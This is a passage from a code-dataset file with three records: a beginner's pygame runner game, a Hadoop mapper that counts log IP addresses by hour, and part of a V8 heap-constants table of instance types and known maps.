+{"seq_id":"36136726199","text":"import pygame \r\nfrom sys import exit\r\nfrom random import randint, choice\r\n#First line we need in pygame.\r\n#It starts pygame and initializes stuffs in it.\r\n#It's like starting a car.\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n player_walk_1 = pygame.image.load(\"graphics/player/player_walk_1.png\").convert_alpha()\r\n player_walk_2 = pygame.image.load(\"graphics/player/player_walk_2.png\").convert_alpha()\r\n self.player_walk = [player_walk_1,player_walk_2]\r\n self.player_index = 0\r\n self.player_jump = pygame.image.load(\"graphics/player/jump.png\").convert_alpha()\r\n\r\n self.image = self.player_walk[self.player_index]\r\n self.rect = self.image.get_rect(midbottom = (80,232))\r\n self.gravity = 0\r\n\r\n self.jump_sound = pygame.mixer.Sound(\"audio/jump.mp3\")\r\n self.jump_sound.set_volume(0.5)\r\n #Makes player jump. - code with same functionality exists in while loop.\r\n def player_input(self):\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_SPACE] and self.rect.bottom >= 232:\r\n self.gravity = -20\r\n self.jump_sound.play()\r\n\r\n def apply_gravity(self):\r\n self.gravity += 1\r\n self.rect.y += self.gravity\r\n if self.rect.bottom >= 232:\r\n self.rect.bottom = 232\r\n\r\n def animation_state(self):\r\n if self.rect.bottom < 232:\r\n self.image = self.player_jump\r\n else:\r\n self.player_index += 0.1\r\n if self.player_index >= len(self.player_walk): self.player_index = 0\r\n self.image = self.player_walk[int(self.player_index)]\r\n def update(self):\r\n self.player_input()\r\n self.apply_gravity()\r\n self.animation_state()\r\n\r\nclass Obstacle(pygame.sprite.Sprite):\r\n def __init__(self,type):\r\n super().__init__()\r\n\r\n if type == \"fly\":\r\n fly_1 = pygame.image.load(\"graphics/fly/fly1.png\").convert_alpha()\r\n fly_2 = pygame.image.load(\"graphics/fly/fly2.png\").convert_alpha()\r\n self.frames = [fly_1,fly_2]\r\n y_pos = 210\r\n else:\r\n snail_1 = pygame.image.load('graphics/snail/snail1.png').convert_alpha()\r\n snail_2 = pygame.image.load('graphics/snail/snail2.png').convert_alpha()\r\n self.frames = [snail_1,snail_2]\r\n y_pos = 232\r\n\r\n self.animation_index = 0\r\n self.image = self.frames[self.animation_index]\r\n self.rect = self.image.get_rect(midbottom = (randint(900,1100),y_pos))\r\n\r\n def animation_state(self):\r\n self.animation_index += 0.1\r\n if self.animation_index >= len(self.frames): self.animation_index = 0\r\n self.image = self.frames[int(self.animation_index)]\r\n\r\n def update(self):\r\n self.animation_state()\r\n self.rect.x -= 6\r\n self.destroy()\r\n\r\n def destroy(self):\r\n if self.rect.x <= 100:\r\n self.kill() \r\n\r\n\r\npygame.init()\r\n\r\ndef obstacle_movement(obstacle_list):\r\n\r\n if obstacle_list:\r\n for obstacle_rect in obstacle_list:\r\n obstacle_rect.x -= 5\r\n\r\n if obstacle_rect.bottom == 300: \r\n screen.blit(snail_surface, obstacle_rect)\r\n else:\r\n screen.blit(fly_surf, obstacle_rect)\r\n\r\n obstacle_list = [obstacle for obstacle in obstacle_list if obstacle.x > - 100]\r\n return obstacle_list #Used to make code in function a global variable, instead of using the \"global\" key word.\r\n else: return []\r\n\r\ndef collisions(player,obstacles):\r\n if obstacles:\r\n for obstacle_rect in obstacles:\r\n if player.colliderect(obstacle_rect): return False\r\n return True\r\n\r\ndef collision_sprite():\r\n if pygame.sprite.spritecollide(player.sprite,obstacle_group,False):\r\n obstacle_group.empty()\r\n return False\r\n else: return True\r\n\r\ndef display_score():\r\n current_time = int(pygame.time.get_ticks() / 1000) - start_time\r\n score_surf = text_font.render(f'Score: {current_time}', False, (64,64,64))\r\n score_rect = score_surf.get_rect(center = (400,50))\r\n screen.blit(score_surf, score_rect)\r\n return current_time\r\n \r\ndef player_animation():\r\n global player_surf, player_index\r\n\r\n if player_rect.bottom < 232:\r\n player_surf = player_jump\r\n else: \r\n player_index += 0.1\r\n if player_index >= len(player_walk):player_index = 0\r\n player_surf = player_walk[int(player_index)]\r\n\r\n\r\n\r\n #play walking anime if player is on floor.\r\n #display jump surface if player not on floor.\r\n\r\n#Creating a display surface - the window the user will see.\r\nscreen = pygame.display.set_mode((800,400))\r\n#Name of game window.\r\npygame.display.set_caption(\"Gamer\")\r\n\r\n#MAXIMUM FRAME RATE.\r\n#Clock object to help with time and controlling the frame rate.\r\nclock = pygame.time.Clock()\r\ngame_active = False\r\nstart_time = 0\r\nscore = 0\r\nmusic = pygame.mixer.Sound(\"audio/music.wav\")\r\nmusic.play(loops = -1)\r\n\r\n#GROUPS\r\nplayer = pygame.sprite.GroupSingle()\r\nplayer.add(Player())\r\nobstacle_group = pygame.sprite.Group()\r\n\r\n#Font\r\ntext_font = pygame.font.Font('font/Pixeltype.ttf', 30)\r\n#Sky image.\r\nsky_surface = pygame.image.load(\"graphics/hallo-sky.png\").convert()\r\n#Ground image.\r\nground_surface = pygame.image.load(\"graphics/ground.png\").convert()\r\n\"\"\"\r\nscore_surf = text_font.render(\"SCORE\", False, (64, 64, 64))\r\nscore_rect = score_surf.get_rect(center = (40, 15))\r\n\"\"\"\r\n\r\n#Obstacles\r\n#Snail\r\nsnail_frame_1 = pygame.image.load(\"graphics/snail/snail1.png\").convert_alpha()\r\nsnail_frame_2 = pygame.image.load(\"graphics/snail/snail2.png\").convert_alpha()\r\nsnail_frames = [snail_frame_1, snail_frame_2]\r\nsnail_frame_index = 0\r\nsnail_surface = snail_frames[snail_frame_index]\r\nsnail_x = 600\r\nsnail_rect = snail_surface.get_rect(topleft = (snail_x,200))\r\n\r\n\r\n#Fly\r\nfly_frame_1 = pygame.image.load(\"graphics/fly/fly1.png\").convert_alpha()\r\nfly_frame_2 = pygame.image.load(\"graphics/fly/fly2.png\").convert_alpha()\r\nfly_frames = [fly_frame_1, fly_frame_2]\r\nfly_frame_index = 0\r\nfly_surf = fly_frames[fly_frame_index]\r\n\r\n\r\nobstacle_rect_list = []\r\n\r\nplayer_walk_1 = pygame.image.load(\"graphics/player/player_walk_1.png\").convert_alpha()\r\nplayer_walk_2 = pygame.image.load(\"graphics/player/player_walk_2.png\").convert_alpha()\r\nplayer_walk = [player_walk_1,player_walk_2]\r\nplayer_index = 0\r\nplayer_jump = pygame.image.load(\"graphics/player/jump.png\").convert_alpha()\r\n\r\nplayer_surf = player_walk[player_index]\r\nplayer_rect = player_surf.get_rect(midbottom = (80,230))\r\n#GRAVITY\r\nplayer_gravity = 0\r\n#MENU\r\nplayer_stand = pygame.image.load(\"graphics\\Player\\player_stand.png\").convert_alpha()\r\nplayer_stand = pygame.transform.rotozoom(player_stand,0,2)\r\nplayer_stand_rect = player_stand.get_rect(center=(400,200))\r\n#MENU'S FONT\r\ntitle_font = text_font.render(\"Grapple One\", False, \"green\") #Font surface\r\ntitle_rect = title_font.get_rect(midbottom = (400,100))\r\n#Instruction\r\nmsg = text_font.render(\"Press SPACE to start\", False, \"green\")\r\nmsg_rect = msg.get_rect(midtop=(400, 300))\r\n\r\n#TIMER\r\nobstacle_timer = pygame.USEREVENT + 1\r\npygame.time.set_timer(obstacle_timer, 1500) #Triggers event in certain intervals.\r\n\r\nsnail_animation_timer = pygame.USEREVENT + 2\r\npygame.time.set_timer(snail_animation_timer, 500)\r\n\r\nfly_animation_timer = pygame.USEREVENT + 3\r\npygame.time.set_timer(fly_animation_timer, 200)\r\n\r\n\r\n#Keeps code running forever.\r\nwhile True:\r\n for event in pygame.event.get():\r\n #Used to close the window. without it the windown will keep on running without closing.\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n #Most secure way to close pygame is to use the \"sys module.\" \"exit()\" is imported from the sys module.\r\n exit()\r\n \r\n if game_active:\r\n #MOUSE POSITON.\r\n if event.type == pygame.MOUSEBUTTONDOWN: \r\n if player_rect.collidepoint(event.pos) and player_rect.bottom >= 232: \r\n player_gravity = -20\r\n \r\n #KEYBOARD INPUT CONTROLS USING EVENTS.\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_SPACE and player_rect.bottom >= 232:\r\n player_gravity = -20\r\n\r\n #TIMER FOR SNAIL.\r\n if event.type == snail_animation_timer:\r\n if snail_frame_index == 0: snail_frame_index = 1\r\n else: snail_frame_index = 0\r\n snail_surface = snail_frames[snail_frame_index]\r\n\r\n #TIMER FOR FLY.\r\n if event.type == fly_animation_timer:\r\n if fly_frame_index == 0: fly_frame_index == 1\r\n else: fly_frame_index = 0\r\n fly_surf = fly_frames[fly_frame_index]\r\n\r\n else:\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n game_active = True\r\n snail_rect.left = 800 \r\n start_time = int(pygame.time.get_ticks()/1000)\r\n\r\n\r\n if event.type == obstacle_timer:\r\n obstacle_group.add(Obstacle(choice([\"fly\",\"snail\",\"snail\",\"snail\",])))\r\n \"\"\"\r\n if randint(0,2):\r\n obstacle_rect_list.append(snail_surface.get_rect(topleft = (randint(900,1100),200)))\r\n else:\r\n obstacle_rect_list.append(fly_surf.get_rect(topleft = (randint(900,1100),110)))\r\n \"\"\"\r\n if game_active:\r\n\r\n screen.blit(sky_surface,(0, 0))\r\n screen.blit(ground_surface, (0,232))\r\n \r\n score = display_score() \r\n\r\n #Obstacle movement.\r\n #obstacle_rect_list = obstacle_movement(obstacle_rect_list)\r\n \r\n #Collisions\r\n game_active = collision_sprite()\r\n #game_active = collisions(player_rect, obstacle_rect_list)\r\n #SIMULATION GROUND COLLISION. \r\n if player_rect.bottom >= 232:\r\n player_rect.bottom = 232\r\n\r\n \r\n #PLAYER\r\n \"\"\"\r\n player_gravity += 1\r\n player_rect.y += player_gravity\r\n screen.blit(player_surf, player_rect )\r\n screen.blit(snail_surface, snail_rect)\r\n snail_rect.left -= 3\r\n if snail_rect.right <= 0: snail_rect.left = 800\r\n player_animation()\r\n \"\"\"\r\n player.draw(screen)\r\n player.update()\r\n\r\n obstacle_group.draw(screen)\r\n obstacle_group.update()\r\n\r\n #COLLISION \r\n if snail_rect.colliderect(player_rect):\r\n #pygame.quit()\r\n #exit() \r\n game_active = False\r\n \r\n else:\r\n #EXITS TO MENU SCREEN IF GAME IS OVER.\r\n mnu = pygame.image.load(\"graphics/menu-screen.png\")\r\n mnu = pygame.transform.scale(mnu, (800, 400))\r\n mnu_rect = mnu.get_rect()\r\n mnu_rect = mnu_rect.move((0, 0))\r\n\r\n screen.blit(mnu, mnu_rect)\r\n #screen.fill((94, 129, 162))\r\n screen.blit(player_stand,player_stand_rect)\r\n obstacle_rect_list.clear()\r\n player_rect.midbottom = (80,230)\r\n player_gravity = 0\r\n\r\n screen.blit(title_font, title_rect)\r\n screen.blit(msg, msg_rect)\r\n\r\n score_msg = text_font.render(f\"Your score: {score}\", False,\"green\")\r\n score_rect = score_msg.get_rect(center=(400,330))\r\n \r\n\r\n if score == 0: screen.blit(msg,msg_rect)\r\n else: screen.blit(score_msg,score_rect)\r\n \r\n \r\n #Draw all elements and update everything.\r\n pygame.display.update()\r\n #Calling the clock object to run 60fps.\r\n clock.tick(60)\r\n\r\n\r\n#RESOURCE\r\n\"\"\"\r\nKEYBOARD INPUT CONTROLS USING \"pygame.key\"\r\nkey = pygame.key.get_pressed()\r\nif key[pygame.K_SPACE]:\r\n\"\"\" \r\n#COLLISION\r\n#Using colliderect to chech for collision.\r\n#if player_rect.colliderect(snail_rect):\r\n# print(\"collision\")\r\n\"\"\"\r\nmouse_coor = pygame.mouse.get_pos()\r\nif player_rect.collidepoint(mouse_coor):\r\nprint(pygame.mouse.get_pressed()) \r\n\"\"\"\r\n\r\n# pygame.draw.rect(screen, \"#c0e8ec\", score_rect)\r\n # pygame.draw.rect(screen, \"#c0e8ec\", score_rect, 10)\r\n #pygame.draw.ellipse(screen,\"Brown\", pygame.Rect(50,200,100,100))\r\n # screen.blit(score_surf, score_rect)\r\n\r\n#screen.blit(player_surf(80, 200))\r\n #snail_x -= 4\r\n #snail_rect.left -= 4 #Updated version - using rect instead of image surface.\r\n #Snail movement restrictions.\r\n #if snail_x < 0:\r\n #snail_x = 800 ","repo_name":"calvin-hello/pygame-2","sub_path":"Pygame 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35143465221","text":"import re\nimport sys\n\n# pat = re.compile('(?P\\d+.\\d+.\\d+.\\d+').*?\"\\w+ (?P.*?) ')\n# pat = re.compile(\"(?P\\d+\\d+.\\d+.\\d+).*?\\d{4}:(?P\\d{2}).*? \")\n# ?P creates a match group names ip\nrange = sys.argv[1]\n#print(\"range is\", range)\nlow, high = range.split(\"-\")\n\npat = re.compile('(?P\\d+.\\d+.\\d+.\\d+).*?\\d{4}:(?P\\d{2}):\\d{2}.*? ')\n\n\n\nfor line in sys.stdin:\n match = pat.search(line)\n if match:\n hour = match.group('hour')\n if int(hour) >= int(low) and int(hour) < int(high):\n print(\"[\" + hour + \":00\" + \"]\" + match.group('ip') + \"\\t\" + \"1\")\n\n\n","repo_name":"aditigode/Hadoop-searchIPaddresses","sub_path":"part2/part2a/mapper_chain1.py","file_name":"mapper_chain1.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16483989704","text":"INSTANCE_TYPES = {\n 0: \"INTERNALIZED_STRING_TYPE\",\n 2: \"EXTERNAL_INTERNALIZED_STRING_TYPE\",\n 8: \"ONE_BYTE_INTERNALIZED_STRING_TYPE\",\n 10: \"EXTERNAL_ONE_BYTE_INTERNALIZED_STRING_TYPE\",\n 18: \"EXTERNAL_INTERNALIZED_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 34: \"UNCACHED_EXTERNAL_INTERNALIZED_STRING_TYPE\",\n 42: \"UNCACHED_EXTERNAL_ONE_BYTE_INTERNALIZED_STRING_TYPE\",\n 50: \"UNCACHED_EXTERNAL_INTERNALIZED_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 64: \"STRING_TYPE\",\n 65: \"CONS_STRING_TYPE\",\n 66: \"EXTERNAL_STRING_TYPE\",\n 67: \"SLICED_STRING_TYPE\",\n 69: \"THIN_STRING_TYPE\",\n 72: \"ONE_BYTE_STRING_TYPE\",\n 73: \"CONS_ONE_BYTE_STRING_TYPE\",\n 74: \"EXTERNAL_ONE_BYTE_STRING_TYPE\",\n 75: \"SLICED_ONE_BYTE_STRING_TYPE\",\n 77: \"THIN_ONE_BYTE_STRING_TYPE\",\n 82: \"EXTERNAL_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 98: \"UNCACHED_EXTERNAL_STRING_TYPE\",\n 106: \"UNCACHED_EXTERNAL_ONE_BYTE_STRING_TYPE\",\n 114: \"UNCACHED_EXTERNAL_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 128: \"SYMBOL_TYPE\",\n 129: \"HEAP_NUMBER_TYPE\",\n 130: \"BIGINT_TYPE\",\n 131: \"ODDBALL_TYPE\",\n 132: \"MAP_TYPE\",\n 133: \"CODE_TYPE\",\n 134: \"MUTABLE_HEAP_NUMBER_TYPE\",\n 135: \"FOREIGN_TYPE\",\n 136: \"BYTE_ARRAY_TYPE\",\n 137: \"BYTECODE_ARRAY_TYPE\",\n 138: \"FREE_SPACE_TYPE\",\n 139: \"FIXED_INT8_ARRAY_TYPE\",\n 140: \"FIXED_UINT8_ARRAY_TYPE\",\n 141: \"FIXED_INT16_ARRAY_TYPE\",\n 142: \"FIXED_UINT16_ARRAY_TYPE\",\n 143: \"FIXED_INT32_ARRAY_TYPE\",\n 144: \"FIXED_UINT32_ARRAY_TYPE\",\n 145: \"FIXED_FLOAT32_ARRAY_TYPE\",\n 146: \"FIXED_FLOAT64_ARRAY_TYPE\",\n 147: \"FIXED_UINT8_CLAMPED_ARRAY_TYPE\",\n 148: \"FIXED_BIGINT64_ARRAY_TYPE\",\n 149: \"FIXED_BIGUINT64_ARRAY_TYPE\",\n 150: \"FIXED_DOUBLE_ARRAY_TYPE\",\n 151: \"FEEDBACK_METADATA_TYPE\",\n 152: \"FILLER_TYPE\",\n 153: \"ACCESS_CHECK_INFO_TYPE\",\n 154: \"ACCESSOR_INFO_TYPE\",\n 155: \"ACCESSOR_PAIR_TYPE\",\n 156: \"ALIASED_ARGUMENTS_ENTRY_TYPE\",\n 157: \"ALLOCATION_MEMENTO_TYPE\",\n 158: \"ASYNC_GENERATOR_REQUEST_TYPE\",\n 159: \"DEBUG_INFO_TYPE\",\n 160: \"FUNCTION_TEMPLATE_INFO_TYPE\",\n 161: \"INTERCEPTOR_INFO_TYPE\",\n 162: \"INTERPRETER_DATA_TYPE\",\n 163: \"MODULE_INFO_ENTRY_TYPE\",\n 164: \"MODULE_TYPE\",\n 165: \"OBJECT_TEMPLATE_INFO_TYPE\",\n 166: \"PROMISE_CAPABILITY_TYPE\",\n 167: \"PROMISE_REACTION_TYPE\",\n 168: \"PROTOTYPE_INFO_TYPE\",\n 169: \"SCRIPT_TYPE\",\n 170: \"STACK_FRAME_INFO_TYPE\",\n 171: \"TUPLE2_TYPE\",\n 172: \"TUPLE3_TYPE\",\n 173: \"ARRAY_BOILERPLATE_DESCRIPTION_TYPE\",\n 174: \"WASM_DEBUG_INFO_TYPE\",\n 175: \"WASM_EXPORTED_FUNCTION_DATA_TYPE\",\n 176: \"CALLABLE_TASK_TYPE\",\n 177: \"CALLBACK_TASK_TYPE\",\n 178: \"PROMISE_FULFILL_REACTION_JOB_TASK_TYPE\",\n 179: \"PROMISE_REJECT_REACTION_JOB_TASK_TYPE\",\n 180: \"PROMISE_RESOLVE_THENABLE_JOB_TASK_TYPE\",\n 181: \"MICROTASK_QUEUE_TYPE\",\n 182: \"ALLOCATION_SITE_TYPE\",\n 183: \"FIXED_ARRAY_TYPE\",\n 184: \"OBJECT_BOILERPLATE_DESCRIPTION_TYPE\",\n 185: \"HASH_TABLE_TYPE\",\n 186: \"ORDERED_HASH_MAP_TYPE\",\n 187: \"ORDERED_HASH_SET_TYPE\",\n 188: \"NAME_DICTIONARY_TYPE\",\n 189: \"GLOBAL_DICTIONARY_TYPE\",\n 190: \"NUMBER_DICTIONARY_TYPE\",\n 191: \"SIMPLE_NUMBER_DICTIONARY_TYPE\",\n 192: \"STRING_TABLE_TYPE\",\n 193: \"EPHEMERON_HASH_TABLE_TYPE\",\n 194: \"SCOPE_INFO_TYPE\",\n 195: \"SCRIPT_CONTEXT_TABLE_TYPE\",\n 196: \"AWAIT_CONTEXT_TYPE\",\n 197: \"BLOCK_CONTEXT_TYPE\",\n 198: \"CATCH_CONTEXT_TYPE\",\n 199: \"DEBUG_EVALUATE_CONTEXT_TYPE\",\n 200: \"EVAL_CONTEXT_TYPE\",\n 201: \"FUNCTION_CONTEXT_TYPE\",\n 202: \"MODULE_CONTEXT_TYPE\",\n 203: \"NATIVE_CONTEXT_TYPE\",\n 204: \"SCRIPT_CONTEXT_TYPE\",\n 205: \"WITH_CONTEXT_TYPE\",\n 206: \"WEAK_FIXED_ARRAY_TYPE\",\n 207: \"DESCRIPTOR_ARRAY_TYPE\",\n 208: \"TRANSITION_ARRAY_TYPE\",\n 209: \"CALL_HANDLER_INFO_TYPE\",\n 210: \"CELL_TYPE\",\n 211: \"CODE_DATA_CONTAINER_TYPE\",\n 212: \"FEEDBACK_CELL_TYPE\",\n 213: \"FEEDBACK_VECTOR_TYPE\",\n 214: \"LOAD_HANDLER_TYPE\",\n 215: \"PRE_PARSED_SCOPE_DATA_TYPE\",\n 216: \"PROPERTY_ARRAY_TYPE\",\n 217: \"PROPERTY_CELL_TYPE\",\n 218: \"SHARED_FUNCTION_INFO_TYPE\",\n 219: \"SMALL_ORDERED_HASH_MAP_TYPE\",\n 220: \"SMALL_ORDERED_HASH_SET_TYPE\",\n 221: \"STORE_HANDLER_TYPE\",\n 222: \"UNCOMPILED_DATA_WITHOUT_PRE_PARSED_SCOPE_TYPE\",\n 223: \"UNCOMPILED_DATA_WITH_PRE_PARSED_SCOPE_TYPE\",\n 224: \"WEAK_ARRAY_LIST_TYPE\",\n 1024: \"JS_PROXY_TYPE\",\n 1025: \"JS_GLOBAL_OBJECT_TYPE\",\n 1026: \"JS_GLOBAL_PROXY_TYPE\",\n 1027: \"JS_MODULE_NAMESPACE_TYPE\",\n 1040: \"JS_SPECIAL_API_OBJECT_TYPE\",\n 1041: \"JS_VALUE_TYPE\",\n 1056: \"JS_API_OBJECT_TYPE\",\n 1057: \"JS_OBJECT_TYPE\",\n 1058: \"JS_ARGUMENTS_TYPE\",\n 1059: \"JS_ARRAY_BUFFER_TYPE\",\n 1060: \"JS_ARRAY_ITERATOR_TYPE\",\n 1061: \"JS_ARRAY_TYPE\",\n 1062: \"JS_ASYNC_FROM_SYNC_ITERATOR_TYPE\",\n 1063: \"JS_ASYNC_GENERATOR_OBJECT_TYPE\",\n 1064: \"JS_CONTEXT_EXTENSION_OBJECT_TYPE\",\n 1065: \"JS_DATE_TYPE\",\n 1066: \"JS_ERROR_TYPE\",\n 1067: \"JS_GENERATOR_OBJECT_TYPE\",\n 1068: \"JS_MAP_TYPE\",\n 1069: \"JS_MAP_KEY_ITERATOR_TYPE\",\n 1070: \"JS_MAP_KEY_VALUE_ITERATOR_TYPE\",\n 1071: \"JS_MAP_VALUE_ITERATOR_TYPE\",\n 1072: \"JS_MESSAGE_OBJECT_TYPE\",\n 1073: \"JS_PROMISE_TYPE\",\n 1074: \"JS_REGEXP_TYPE\",\n 1075: \"JS_REGEXP_STRING_ITERATOR_TYPE\",\n 1076: \"JS_SET_TYPE\",\n 1077: \"JS_SET_KEY_VALUE_ITERATOR_TYPE\",\n 1078: \"JS_SET_VALUE_ITERATOR_TYPE\",\n 1079: \"JS_STRING_ITERATOR_TYPE\",\n 1080: \"JS_WEAK_MAP_TYPE\",\n 1081: \"JS_WEAK_SET_TYPE\",\n 1082: \"JS_TYPED_ARRAY_TYPE\",\n 1083: \"JS_DATA_VIEW_TYPE\",\n 1084: \"JS_INTL_V8_BREAK_ITERATOR_TYPE\",\n 1085: \"JS_INTL_COLLATOR_TYPE\",\n 1086: \"JS_INTL_DATE_TIME_FORMAT_TYPE\",\n 1087: \"JS_INTL_LIST_FORMAT_TYPE\",\n 1088: \"JS_INTL_LOCALE_TYPE\",\n 1089: \"JS_INTL_NUMBER_FORMAT_TYPE\",\n 1090: \"JS_INTL_PLURAL_RULES_TYPE\",\n 1091: \"JS_INTL_RELATIVE_TIME_FORMAT_TYPE\",\n 1092: \"JS_INTL_SEGMENTER_TYPE\",\n 1093: \"WASM_EXCEPTION_TYPE\",\n 1094: \"WASM_GLOBAL_TYPE\",\n 1095: \"WASM_INSTANCE_TYPE\",\n 1096: \"WASM_MEMORY_TYPE\",\n 1097: \"WASM_MODULE_TYPE\",\n 1098: \"WASM_TABLE_TYPE\",\n 1099: \"JS_BOUND_FUNCTION_TYPE\",\n 1100: \"JS_FUNCTION_TYPE\",\n}\n\n# List of known V8 maps.\nKNOWN_MAPS = {\n (\"RO_SPACE\", 0x02201): (138, \"FreeSpaceMap\"),\n (\"RO_SPACE\", 0x02251): (132, \"MetaMap\"),\n (\"RO_SPACE\", 0x022d1): (131, \"NullMap\"),\n (\"RO_SPACE\", 0x02341): (207, \"DescriptorArrayMap\"),\n (\"RO_SPACE\", 0x023a1): (206, \"WeakFixedArrayMap\"),\n (\"RO_SPACE\", 0x023f1): (152, \"OnePointerFillerMap\"),\n (\"RO_SPACE\", 0x02441): (152, \"TwoPointerFillerMap\"),\n (\"RO_SPACE\", 0x024c1): (131, \"UninitializedMap\"),\n (\"RO_SPACE\", 0x02531): (8, \"OneByteInternalizedStringMap\"),\n (\"RO_SPACE\", 0x025d1): (131, \"UndefinedMap\"),\n (\"RO_SPACE\", 0x02631): (129, \"HeapNumberMap\"),\n (\"RO_SPACE\", 0x026b1): (131, \"TheHoleMap\"),\n (\"RO_SPACE\", 0x02759): (131, \"BooleanMap\"),\n (\"RO_SPACE\", 0x02831): (136, \"ByteArrayMap\"),\n (\"RO_SPACE\", 0x02881): (183, \"FixedArrayMap\"),\n (\"RO_SPACE\", 0x028d1): (183, \"FixedCOWArrayMap\"),\n (\"RO_SPACE\", 0x02921): (185, \"HashTableMap\"),\n (\"RO_SPACE\", 0x02971): (128, \"SymbolMap\"),\n (\"RO_SPACE\", 0x029c1): (72, \"OneByteStringMap\"),\n (\"RO_SPACE\", 0x02a11): (194, \"ScopeInfoMap\"),\n (\"RO_SPACE\", 0x02a61): (218, \"SharedFunctionInfoMap\"),\n (\"RO_SPACE\", 0x02ab1): (133, \"CodeMap\"),\n (\"RO_SPACE\", 0x02b01): (201, \"FunctionContextMap\"),\n (\"RO_SPACE\", 0x02b51): (210, \"CellMap\"),\n (\"RO_SPACE\", 0x02ba1): (217, \"GlobalPropertyCellMap\"),\n (\"RO_SPACE\", 0x02bf1): (135, \"ForeignMap\"),\n (\"RO_SPACE\", 0x02c41): (208, \"TransitionArrayMap\"),\n (\"RO_SPACE\", 0x02c91): (213, \"FeedbackVectorMap\"),\n (\"RO_SPACE\", 0x02d31): (131, \"ArgumentsMarkerMap\"),\n (\"RO_SPACE\", 0x02dd1): (131, \"ExceptionMap\"),\n (\"RO_SPACE\", 0x02e71): (131, \"TerminationExceptionMap\"),\n (\"RO_SPACE\", 0x02f19): (131, \"OptimizedOutMap\"),\n (\"RO_SPACE\", 0x02fb9): (131, \"StaleRegisterMap\"),\n (\"RO_SPACE\", 0x03029): (203, \"NativeContextMap\"),\n (\"RO_SPACE\", 0x03079): (202, \"ModuleContextMap\"),\n (\"RO_SPACE\", 0x030c9): (200, \"EvalContextMap\"),\n (\"RO_SPACE\", 0x03119): (204, \"ScriptContextMap\"),\n (\"RO_SPACE\", 0x03169): (196, \"AwaitContextMap\"),\n (\"RO_SPACE\", 0x031b9): (197, \"BlockContextMap\"),\n (\"RO_SPACE\", 0x03209): (198, \"CatchContextMap\"),\n (\"RO_SPACE\", 0x03259): (205, \"WithContextMap\"),\n (\"RO_SPACE\", 0x032a9): (199, \"DebugEvaluateContextMap\"),\n (\"RO_SPACE\", 0x032f9): (195, \"ScriptContextTableMap\"),\n (\"RO_SPACE\", 0x03349): (151, \"FeedbackMetadataArrayMap\"),\n (\"RO_SPACE\", 0x03399): (183, \"ArrayListMap\"),\n (\"RO_SPACE\", 0x033e9): (130, \"BigIntMap\"),\n (\"RO_SPACE\", 0x03439): (184, \"ObjectBoilerplateDescriptionMap\"),\n (\"RO_SPACE\", 0x03489): (137, \"BytecodeArrayMap\"),\n (\"RO_SPACE\", 0x034d9): (211, \"CodeDataContainerMap\"),\n (\"RO_SPACE\", 0x03529): (150, \"FixedDoubleArrayMap\"),\n (\"RO_SPACE\", 0x03579): (189, \"GlobalDictionaryMap\"),\n (\"RO_SPACE\", 0x035c9): (212, \"ManyClosuresCellMap\"),\n (\"RO_SPACE\", 0x03619): (183, \"ModuleInfoMap\"),\n (\"RO_SPACE\", 0x03669): (134, \"MutableHeapNumberMap\"),\n (\"RO_SPACE\", 0x036b9): (188, \"NameDictionaryMap\"),\n (\"RO_SPACE\", 0x03709): (212, \"NoClosuresCellMap\"),\n (\"RO_SPACE\", 0x03759): (190, \"NumberDictionaryMap\"),\n (\"RO_SPACE\", 0x037a9): (212, \"OneClosureCellMap\"),\n (\"RO_SPACE\", 0x037f9): (186, \"OrderedHashMapMap\"),\n (\"RO_SPACE\", 0x03849): (187, \"OrderedHashSetMap\"),\n (\"RO_SPACE\", 0x03899): (215, \"PreParsedScopeDataMap\"),\n (\"RO_SPACE\", 0x038e9): (216, \"PropertyArrayMap\"),\n (\"RO_SPACE\", 0x03939): (209, \"SideEffectCallHandlerInfoMap\"),\n (\"RO_SPACE\", 0x03989): (209, \"SideEffectFreeCallHandlerInfoMap\"),\n (\"RO_SPACE\", 0x039d9): (209, \"NextCallSideEffectFreeCallHandlerInfoMap\"),\n (\"RO_SPACE\", 0x03a29): (191, \"SimpleNumberDictionaryMap\"),\n (\"RO_SPACE\", 0x03a79): (183, \"SloppyArgumentsElementsMap\"),\n (\"RO_SPACE\", 0x03ac9): (219, \"SmallOrderedHashMapMap\"),\n (\"RO_SPACE\", 0x03b19): (220, \"SmallOrderedHashSetMap\"),\n (\"RO_SPACE\", 0x03b69): (192, \"StringTableMap\"),\n (\"RO_SPACE\", 0x03bb9): (222, \"UncompiledDataWithoutPreParsedScopeMap\"),\n (\"RO_SPACE\", 0x03c09): (223, \"UncompiledDataWithPreParsedScopeMap\"),\n (\"RO_SPACE\", 0x03c59): (224, \"WeakArrayListMap\"),\n (\"RO_SPACE\", 0x03ca9): (193, \"EphemeronHashTableMap\"),\n (\"RO_SPACE\", 0x03cf9): (106, \"NativeSourceStringMap\"),\n (\"RO_SPACE\", 0x03d49): (64, \"StringMap\"),\n (\"RO_SPACE\", 0x03d99): (73, \"ConsOneByteStringMap\"),\n (\"RO_SPACE\", 0x03de9): (65, \"ConsStringMap\"),\n (\"RO_SPACE\", 0x03e39): (77, \"ThinOneByteStringMap\"),\n (\"RO_SPACE\", 0x03e89): (69, \"ThinStringMap\"),\n (\"RO_SPACE\", 0x03ed9): (67, \"SlicedStringMap\"),\n (\"RO_SPACE\", 0x03f29): (75, \"SlicedOneByteStringMap\"),\n (\"RO_SPACE\", 0x03f79): (66, \"ExternalStringMap\"),\n (\"RO_SPACE\", 0x03fc9): (82, \"ExternalStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x04019): (74, \"ExternalOneByteStringMap\"),\n (\"RO_SPACE\", 0x04069): (98, \"UncachedExternalStringMap\"),\n (\"RO_SPACE\", 0x040b9): (114, \"UncachedExternalStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x04109): (0, 